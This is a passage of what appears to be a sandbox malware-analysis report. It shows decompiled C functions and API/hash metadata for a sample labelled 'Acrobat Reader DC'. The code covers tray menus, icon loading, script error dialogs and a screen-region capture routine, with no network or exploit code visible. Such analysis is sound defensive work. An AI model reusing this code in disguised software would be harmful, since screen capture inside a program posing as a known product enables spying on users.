                                  							if(_t13 != 0) {
                                  								_t14 = E004114AB(_t24, _t25, L"warning");
                                  								if(_t14 != 0) {
                                  									ExtractIconExW(_t25, _a8, 0,  &_a16, 1);
                                  									_t9 = _a16;
                                  									if(_t9 == 0) {
                                  										goto L13;
                                  									} else {
                                  										 *_t24 = 1;
                                  										return _t9;
                                  									}
                                  								} else {
                                  									return LoadIconW(_t14, 0x7f03);
                                  								}
                                  							} else {
                                  								return LoadIconW(_t13, 0x7f01);
                                  							}
                                  						} else {
                                  							return LoadIconW(_t12, 0x7f02);
                                  						}
                                  					} else {
                                  						return  *((intOrPtr*)(_a4 + 0x1b0));
                                  					}
                                  				}
                                  			}












                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __wcsicoll$IconLoad
                                  • String ID: blank$info$question$stop$warning
                                  • API String ID: 2485277191-404129466
                                  • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                  • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                  • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                  • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 86%
                                  			E00468B0E(void* __fp0, struct tagMENUITEMINFOW** _a4, struct HWND__* _a8, intOrPtr _a12) {
                                  				struct HMENU__* _v12;
                                  				struct tagPOINT _v20;
                                  				struct tagMENUITEMINFOW _v68;
                                  				signed int _t51;
                                  				signed int _t85;
                                  				struct HWND__* _t87;
                                  				struct HMENU__** _t88;
                                  				void* _t99;
                                  
                                  				_t99 = __fp0;
                                  				_t88 = _a4;
                                  				_v68.cbSize = 0x30;
                                  				E00412F40( &(_v68.fMask), 0, 0x2c);
                                  				_t51 = _a12 + 0xfffffe00;
                                  				_t85 = 0;
                                  				_v12 = _t88[0x274];
                                  				if(_t51 > 6) {
                                  					L20:
                                  					if((_t88[3] & _t85) == 0 ||  *0x4974eb == 0) {
                                  						L34:
                                  						return _t51;
                                  					} else {
                                  						if(_t88[1] == 0) {
                                  							DeleteMenu( *_t88, 5, 0);
                                  							DeleteMenu( *_t88, 4, 0);
                                  							DeleteMenu( *_t88, 6, 0);
                                  							DeleteMenu( *_t88, 3, 0);
                                  							_t88[2] = 0;
                                  						} else {
                                  							if(_t88[2] == 0) {
                                  								if(GetMenuItemCount( *_t88) > 0) {
                                  									_t88[0x274] = 4;
                                  									E0045FBAC(_t88, 0, 0x484ea8, 0xffffffff, 0xffffffff, 0);
                                  								}
                                  								_t88[0x274] = 3;
                                  								E0045FBAC(_t88, 0, _t88[0x1f], 0xffffffff, 0xffffffff, 0);
                                  								_t88[0x274] = 5;
                                  								E0045FBAC(_t88, 0, 0x484ea8, 0xffffffff, 0xffffffff, 0);
                                  								_t88[0x274] = 2;
                                  								E0045FBAC(_t88, 0, _t88[0x1b], 0xffffffff, 0xffffffff, 0);
                                  								_t88[0x274] = _v12;
                                  								_t88[2] = 1;
                                  							}
                                  						}
                                  						_t51 = GetMenuItemCount( *_t88);
                                  						if(_t51 <= 0) {
                                  							goto L34;
                                  						} else {
                                  							if(_t88[1] != 0) {
                                  								if(_t88[1] != 0) {
                                  									 *0x4974ec = 1;
                                  									_v68.fMask = 1;
                                  									_v68.fState = 8;
                                  									SetMenuItemInfoW( *_t88, 4, 0,  &_v68);
                                  								}
                                  							} else {
                                  								_t88[1] = 0;
                                  							}
                                  							GetCursorPos( &_v20);
                                  							_t87 = _a8;
                                  							SetForegroundWindow(_t87);
                                  							TrackPopupMenuEx( *_t88, 0, _v20, _v20.y, _t87, 0);
                                  							PostMessageW(_t87, 0, 0, 0);
                                  							return E00401B80(_t88, _t99);
                                  						}
                                  					}
                                  				}
                                  				switch( *((intOrPtr*)(_t51 * 4 +  &M00468D82))) {
                                  					case 0:
                                  						__edi = 0x40;
                                  						_push(0xfffffff5);
                                  						goto L19;
                                  					case 1:
                                  						_t85 = 1;
                                  						_push(0xfffffff9);
                                  						goto L19;
                                  					case 2:
                                  						__edi = 2;
                                  						_push(0xfffffff8);
                                  						goto L19;
                                  					case 3:
                                  						__eflags =  *((char*)(__esi + 0xa));
                                  						__edi = 4;
                                  						if(__eflags == 0) {
                                  							L14:
                                  							_push(0xfffffff3);
                                  							goto L19;
                                  						}
                                  						__ebx = 7;
                                  						_v68.fMask = 1;
                                  						_v68.fState = 8;
                                  						__eflags = __ecx - 7;
                                  						if(__eflags < 0) {
                                  							goto L14;
                                  						} else {
                                  							_a4 = __esi + 0x1d0;
                                  							do {
                                  								__eax = _a4;
                                  								__eax =  *_a4;
                                  								__eflags = __eax;
                                  								if(__eax == 0) {
                                  									goto L11;
                                  								}
                                  								__ecx =  &_v68;
                                  								__eax = GetMenuItemInfoW( *__eax, __ebx, 0, __ecx);
                                  								__eflags = __eax;
                                  								if(__eax == 0) {
                                  									goto L11;
                                  								}
                                  								__eflags = _v68.fState & 0x00001000;
                                  								if((_v68.fState & 0x00001000) == 0) {
                                  									goto L11;
                                  								}
                                  								__eax = _a4;
                                  								__ecx =  *_a4;
                                  								__eflags = __ecx->cbSize -  *__esi;
                                  								if(__eflags == 0) {
                                  									__eax = E00453B6F(__ecx, __eflags, __esi, __ebx);
                                  									goto L14;
                                  								}
                                  								L11:
                                  								_a4 = _a4 + __edi;
                                  								__ebx = __ebx + 1;
                                  								__eflags = __ebx -  *((intOrPtr*)(__esi + 0x9d0));
                                  							} while (__eflags <= 0);
                                  							_push(0xfffffff3);
                                  							goto L19;
                                  						}
                                  					case 4:
                                  						__edi = 8;
                                  						_push(0xfffffff7);
                                  						goto L19;
                                  					case 5:
                                  						__edi = 0x10;
                                  						_push(0xfffffff6);
                                  						goto L19;
                                  					case 6:
                                  						__edi = 0x20;
                                  						_push(0xfffffff2);
                                  						L19:
                                  						_push(_t88);
                                  						_t51 = E00453B16(_t74, _t91);
                                  						goto L20;
                                  				}
                                  			}












                                  APIs
                                  • _memset.LIBCMT ref: 00468B29
                                  • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                  • GetMenuItemCount.USER32 ref: 00468C45
                                  • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                  • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                  • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                  • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                  • GetMenuItemCount.USER32 ref: 00468CFD
                                  • SetMenuItemInfoW.USER32 ref: 00468D35
                                  • GetCursorPos.USER32(?,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D3F
                                  • SetForegroundWindow.USER32(?,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D49
                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                  • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                  • String ID: 0
                                  • API String ID: 3993528054-4108050209
                                  • Opcode ID: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                                  • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                  • Opcode Fuzzy Hash: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                                  • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0045FD57(void* __eflags, void* __fp0, signed int _a4, int _a8, int _a12) {
                                  				int _v12;
                                  				char _v16;
                                  				int _v20;
                                  				struct tagMENUITEMINFOW _v68;
                                  				struct HMENU__** _t69;
                                  				signed int _t81;
                                  				int _t82;
                                  				signed int _t85;
                                  				intOrPtr _t86;
                                  				signed int _t88;
                                  				intOrPtr _t89;
                                  				signed int _t91;
                                  				unsigned int _t99;
                                  				signed int _t100;
                                  				struct HMENU__* _t101;
                                  				int _t113;
                                  				int _t114;
                                  				int _t115;
                                  				int _t118;
                                  				int _t119;
                                  				struct HMENU__** _t120;
                                  				void* _t126;
                                  
                                  				_t126 = __fp0;
                                  				_t99 = _a8;
                                  				_t120 = _a4;
                                  				_v68.cbSize = 0x30;
                                  				E00412F40( &(_v68.fMask), 0, 0x2c);
                                  				_t102 =  &_a8;
                                  				_v68.fMask = 1;
                                  				_a8 = 0xffffffff;
                                  				if(E00434179(_t120, _t99 & 0x0000ffff,  &_a8) == 0) {
                                  					L38:
                                  					__eflags = 0;
                                  					return 0;
                                  				} else {
                                  					_t113 = _a8;
                                  					_t69 =  *(_t120 + 0x1b4 + _t113 * 4);
                                  					if(_t113 != 3) {
                                  						__eflags = _t113 - 4;
                                  						if(_t113 != 4) {
                                  							_t100 = _t99 >> 0x10;
                                  							__eflags = _t100;
                                  							if(_t100 != 0) {
                                  								goto L38;
                                  							} else {
                                  								__eflags = _a12 - _t100;
                                  								if(_a12 != _t100) {
                                  									goto L38;
                                  								} else {
                                  									__eflags =  *0x4974ec - _t100;
                                  									if( *0x4974ec != _t100) {
                                  										goto L38;
                                  									} else {
                                  										__eflags = _t120[1];
                                  										_t101 =  *_t69;
                                  										if(_t120[1] == 0) {
                                  											L34:
                                  											__eflags = _t120[1];
                                  											if(__eflags == 0) {
                                  												goto L33;
                                  											} else {
                                  												GetMenuItemInfoW(_t101, _t113, 0,  &_v68);
                                  												__eflags = _v68.fState & 0x00000008;
                                  												if((_v68.fState & 0x00000008) == 0) {
                                  													_t62 =  &(_v68.fState);
                                  													 *_t62 = _v68.fState | 0x00000008;
                                  													__eflags =  *_t62;
                                  													SetMenuItemInfoW(_t101, _t113, 0,  &_v68);
                                  													E00453B6F( &_v68, __eflags, _t120, _t113);
                                  													return 1;
                                  												} else {
                                  													_t59 =  &(_v68.fState);
                                  													 *_t59 = _v68.fState ^ 0x00000008;
                                  													__eflags =  *_t59;
                                  													SetMenuItemInfoW(_t101, _t113, 0,  &_v68);
                                  													E00453B6F( &_v68, __eflags, _t120, _t113);
                                  													return 1;
                                  												}
                                  											}
                                  										} else {
                                  											__eflags = _t69[1];
                                  											if(_t69[1] == 0) {
                                  												goto L34;
                                  											} else {
                                  												_a12 = 0xffffffff;
                                  												_t81 = GetMenuItemCount(_t101);
                                  												__eflags = _t120[1];
                                  												_a4 = _t81;
                                  												if(_t120[1] != 0) {
                                  													_t81 = _t81 - 4;
                                  													__eflags = _t81;
                                  													_a4 = _t81;
                                  												}
                                  												_t114 = 0;
                                  												__eflags = _t81;
                                  												if(_t81 <= 0) {
                                  													_t82 = _a12;
                                  													goto L22;
                                  												} else {
                                  													while(1) {
                                  														_t82 = GetMenuItemID(_t101, _t114);
                                  														__eflags = _t82 - _a8;
                                  														if(_t82 == _a8) {
                                  															break;
                                  														}
                                  														_t114 = _t114 + 1;
                                  														__eflags = _t114 - _a4;
                                  														if(_t114 < _a4) {
                                  															continue;
                                  														} else {
                                  															L22:
                                  															__eflags = _t82 - _a8;
                                  															if(__eflags == 0) {
                                  																break;
                                  															}
                                  														}
                                  														goto L32;
                                  													}
                                  													_v12 = _t114;
                                  													_t115 = _t114 - 1;
                                  													__eflags = _t115;
                                  													while(_t115 >= 0) {
                                  														_a12 = GetMenuItemID(_t101, _t115);
                                  														_t88 = E00434179(_t120, _t87,  &_v16);
                                  														__eflags = _t88;
                                  														if(_t88 == 0) {
                                  															goto L26;
                                  														} else {
                                  															_t89 =  *((intOrPtr*)(_t120 + 0x1b4 + _a12 * 4));
                                  															__eflags =  *((char*)(_t89 + 5));
                                  															if( *((char*)(_t89 + 5)) != 0) {
                                  																goto L26;
                                  															}
                                  														}
                                  														goto L27;
                                  														L26:
                                  														_t115 = _t115 - 1;
                                  														__eflags = _t115;
                                  													}
                                  													L27:
                                  													_v20 = _t115 + 1;
                                  													_t118 = _v12 + 1;
                                  													__eflags = _t118 - _a4;
                                  													while(_t118 < _a4) {
                                  														_a12 = GetMenuItemID(_t101, _t118);
                                  														_t85 = E00434179(_t120, _t84,  &_v16);
                                  														__eflags = _t85;
                                  														if(_t85 == 0) {
                                  															goto L30;
                                  														} else {
                                  															_t86 =  *((intOrPtr*)(_t120 + 0x1b4 + _a12 * 4));
                                  															__eflags =  *((char*)(_t86 + 5));
                                  															if( *((char*)(_t86 + 5)) != 0) {
                                  																goto L30;
                                  															}
                                  														}
                                  														goto L31;
                                  														L30:
                                  														_t118 = _t118 + 1;
                                  														__eflags = _t118 - _a4;
                                  													}
                                  													L31:
                                  													_t102 = _v12;
                                  													_t119 = _t118 - 1;
                                  													__eflags = _t119;
                                  													CheckMenuRadioItem(_t101, _v20, _t119, _v12, 0x400);
                                  												}
                                  												L32:
                                  												_t113 = _a8;
                                  												L33:
                                  												E00453B6F(_t102, __eflags, _t120, _t113);
                                  												return 1;
                                  											}
                                  										}
                                  									}
                                  								}
                                  							}
                                  						} else {
                                  							_t91 = GetMenuItemInfoW( *_t120, _t113, 0,  &_v68);
                                  							__eflags = _t91;
                                  							if(_t91 == 0) {
                                  								goto L38;
                                  							} else {
                                  								__eflags = _v68.fState & 0x00000008;
                                  								if((_v68.fState & 0x00000008) == 0) {
                                  									_t18 =  &(_v68.fState);
                                  									 *_t18 = _v68.fState | 0x00000008;
                                  									__eflags =  *_t18;
                                  									 *0x4974ec = 1;
                                  								} else {
                                  									_v68.fState = _v68.fState ^ 0x00000008;
                                  									 *0x4974ec = 0;
                                  								}
                                  								SetMenuItemInfoW( *_t120, 4, 0,  &_v68);
                                  								E00401B80(_t120, _t126);
                                  								Sleep(0x1f4);
                                  								return 1;
                                  							}
                                  						}
                                  					} else {
                                  						 *0x4974f0 = 2;
                                  						 *0x4974e6 = 1;
                                  						return 1;
                                  					}
                                  				}
                                  			}


























                                  APIs
                                  • _memset.LIBCMT ref: 0045FD75
                                  • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                  • SetMenuItemInfoW.USER32 ref: 0045FE14
                                  • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: InfoItemMenu$Sleep_memset
                                  • String ID: 0
                                  • API String ID: 1504565804-4108050209
                                  • Opcode ID: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                                  • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                  • Opcode Fuzzy Hash: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                                  • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 84%
                                  			E00460879(WCHAR* __edx, void* __fp0, intOrPtr _a4, int _a8, intOrPtr _a12) {
                                  				WCHAR* _v24;
                                  				intOrPtr _v28;
                                  				void* _v44;
                                  				char _v60;
                                  				WCHAR* _v76;
                                  				short _v8272;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				void* _t38;
                                  				intOrPtr _t48;
                                  				intOrPtr _t82;
                                  				int _t83;
                                  				int _t85;
                                  				WCHAR* _t96;
                                  				intOrPtr _t108;
                                  				void* _t117;
                                  
                                  				_t117 = __fp0;
                                  				_t93 = __edx;
                                  				_t38 = E00422240(0x2050);
                                  				_t82 = _a4;
                                  				_t112 = _t82;
                                  				if(_t82 > 0) {
                                  					_t85 =  *0x4a9130; // 0x66
                                  					LoadStringW(GetModuleHandleW(0), _t85,  &_v8272, 0xfff);
                                  					_t96 =  &_v8272;
                                  					E00401B10(_t96,  &_v76, _t112);
                                  					LoadStringW(GetModuleHandleW(0), _a8, _t96, 0xfff);
                                  					E00401B10(_t96,  &_v60, _t112);
                                  					_a4 = E004348DE(_t82);
                                  					_t48 = E004348AA(_t82);
                                  					_t106 = _t48;
                                  					_v28 = _t48;
                                  					_t83 = E00434908(E0043492F(_t82));
                                  					_a8 = _t83;
                                  					_t113 = _t83;
                                  					if(_t83 != 0) {
                                  						_push(_t83);
                                  						_t93 =  &_v8272;
                                  						E0041329B( &_v8272,  &_v8272, L"Line %d  (File \"%s\"):\n\n", _t106);
                                  					} else {
                                  						E0041329B(_t93, _t96, L"Line %d:\n\n", _t106);
                                  					}
                                  					E00401B10( &_v8272,  &_v24, _t113);
                                  					_t108 = _a4;
                                  					E0040D200( &_v24, _t85, _t108, _t117);
                                  					E0040D200( &_v24, _t85, "\n", _t117);
                                  					_t86 =  &_v44;
                                  					E0040BC70( &_v44, _t113);
                                  					_t100 = _a12;
                                  					if(_a12 >= 0) {
                                  						E00402160( &_v44, _t108, _t93, _t100);
                                  						E0040C600( &_v44 | 0xffffffff,  &_v44, _t100);
                                  						E0040D200( &_v44,  &_v44, L"^ ERROR", _t117);
                                  						_t86 =  &_v44;
                                  						E0040BD50( &_v24, _t117,  &_v44);
                                  						E0040D200( &_v24,  &_v44, "\n", _t117);
                                  						_t83 = _a8;
                                  					}
                                  					E0040D200( &_v24, _t86, L"\nError: ", _t117);
                                  					E0040BD50( &_v24, _t117,  &_v60);
                                  					_t116 =  *0x4a90eb;
                                  					if( *0x4a90eb == 0) {
                                  						MessageBoxW(0, _v24, _v76, 0x11010);
                                  					} else {
                                  						_push(_v44);
                                  						_push(_t108);
                                  						_push(_v60);
                                  						_push(_v28);
                                  						_push(_t83);
                                  						_push(L"%s (%d) : ==> %s: \n%s \n%s\n");
                                  						E00413ABE(_t83, _v28, L"\nError: ", _t108, _t116);
                                  					}
                                  					E00402250( &_v44);
                                  					E00402250( &_v24);
                                  					E00402250( &_v60);
                                  					return E00402250( &_v76);
                                  				}
                                  				return _t38;
                                  			}






















                                  APIs
                                  • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                  • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                  • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                  • __swprintf.LIBCMT ref: 00460915
                                  • __swprintf.LIBCMT ref: 0046092D
                                  • _wprintf.LIBCMT ref: 004609E1
                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                  • API String ID: 3631882475-2268648507
                                  • Opcode ID: fa3f6862133619af0c8d91bc8d1f7a2e71e3d76ca5879c2374ca29fe6f13d18d
                                  • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                  • Opcode Fuzzy Hash: fa3f6862133619af0c8d91bc8d1f7a2e71e3d76ca5879c2374ca29fe6f13d18d
                                  • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 90%
                                  			E004313CA(int _a4, int _a8, void* _a12, char _a15, intOrPtr* _a16) {
                                  				char _v5;
                                  				struct HBITMAP__* _v12;
                                  				struct HDC__* _v16;
                                  				void* _v20;
                                  				intOrPtr _v24;
                                  				char _v28;
                                  				intOrPtr _v52;
                                  				struct HWND__* _v56;
                                  				intOrPtr _v60;
                                  				signed int _v64;
                                  				int _v68;
                                  				struct tagBITMAPINFO _v72;
                                  				void* __edi;
                                  				void* __esi;
                                  				int _t60;
                                  				intOrPtr _t64;
                                  				void* _t71;
                                  				int _t72;
                                  				intOrPtr _t77;
                                  				void* _t78;
                                  				int _t79;
                                  				int _t91;
                                  				int _t94;
                                  				intOrPtr _t96;
                                  				int _t98;
                                  				int _t105;
                                  				intOrPtr _t108;
                                  				int _t109;
                                  				int _t114;
                                  				struct HDC__* _t115;
                                  				struct HDC__* _t116;
                                  				int* _t119;
                                  				int _t120;
                                  				void* _t121;
                                  
                                  				_t119 = _a12;
                                  				_t60 = _t119[2];
                                  				_t94 =  *_t119;
                                  				_t105 = _t119[1];
                                  				_t114 = _t119[3];
                                  				_a15 = _t60 - _t94 < 0;
                                  				_v5 = _t114 - _t105 < 0;
                                  				if(_a15 != 0) {
                                  					 *_t119 = _t60;
                                  					_t119[2] = _t94;
                                  				}
                                  				if(_v5 != 0) {
                                  					_t119[1] = _t114;
                                  					_t119[3] = _t105;
                                  				}
                                  				E0043137E( *((intOrPtr*)(_a4 + 0x104)),  &_v28, _a8);
                                  				_t64 = _v28;
                                  				 *_t119 =  *_t119 + _t64;
                                  				_t119[2] = _t119[2] + _t64;
                                  				_t96 = _v24;
                                  				_t119[3] = _t119[3] + _t96;
                                  				_t119[1] = _t119[1] + _t96;
                                  				_a8 = _t119[2] -  *_t119 + 1;
                                  				_t91 = _t119[3] - _t119[1] + 1;
                                  				_t115 = GetDC(0);
                                  				_v16 = _t115;
                                  				_v12 = CreateCompatibleBitmap(_t115, _a8, _t91);
                                  				_t116 = CreateCompatibleDC(_t115);
                                  				_t71 = SelectObject(_t116, _v12);
                                  				_t108 = _v5;
                                  				_v20 = _t71;
                                  				_t98 = _t91;
                                  				if(_t108 != 0) {
                                  					_t98 =  ~_t98;
                                  				}
                                  				_t72 = _a8;
                                  				if(_a15 != 0) {
                                  					_t72 =  ~_t72;
                                  				}
                                  				if(_t108 == 0) {
                                  					_t109 = _t119[1];
                                  				} else {
                                  					_t109 = _t119[3];
                                  				}
                                  				_t132 = _a15;
                                  				_a4 = _t109;
                                  				if(_a15 == 0) {
                                  					_t120 =  *_t119;
                                  				} else {
                                  					_t120 = _t119[2];
                                  				}
                                  				StretchBlt(_t116, 0, 0, _a8, _t91, _v16, _t120, _a4, _t72, _t98, 0xcc0020);
                                  				_t121 = _v12;
                                  				_v64 =  ~_t91;
                                  				_v72.bmiHeader = 0x28;
                                  				_v68 = _a8;
                                  				_v60 = 0x200001;
                                  				_v56 = 0;
                                  				GetDIBits(_t116, _t121, 0, 0, 0,  &_v72, 0);
                                  				_t77 = _v52;
                                  				_push(_t77);
                                  				 *_a16 = _t77;
                                  				_t78 = E004115D7(_t116, _t121, _t132);
                                  				_a12 = _t78;
                                  				_t79 = GetDIBits(_t116, _t121, 0, _t91, _t78,  &_v72, 0);
                                  				SelectObject(_t116, _v20);
                                  				DeleteObject(_t121);
                                  				DeleteDC(_t116);
                                  				ReleaseDC(0, _v16);
                                  				if(_t79 == 0) {
                                  					_push(_a12);
                                  					E004111DC();
                                  					__eflags = 0;
                                  					return 0;
                                  				} else {
                                  					return _a12;
                                  				}
                                  			}

                                  APIs
                                  • GetDC.USER32(00000000), ref: 0043143E
                                  • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                  • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                  • SelectObject.GDI32(00000000,?), ref: 00431466
                                  • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                  • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                  • String ID: (
                                  • API String ID: 3300687185-3887548279
                                  • Opcode ID: 606d77b4f1bde06d9a9935c8edd261f35aeb593e5eea415e727307547a522621
                                  • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                  • Opcode Fuzzy Hash: 606d77b4f1bde06d9a9935c8edd261f35aeb593e5eea415e727307547a522621
                                  • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 64%
                                  			E00432A10(void* __ecx, short* _a4, struct _SYSTEMTIME* _a8, char _a12, signed int _a16) {
                                  				short _v8;
                                  				short _v12;
                                  				char _v16;
                                  				void* _t43;
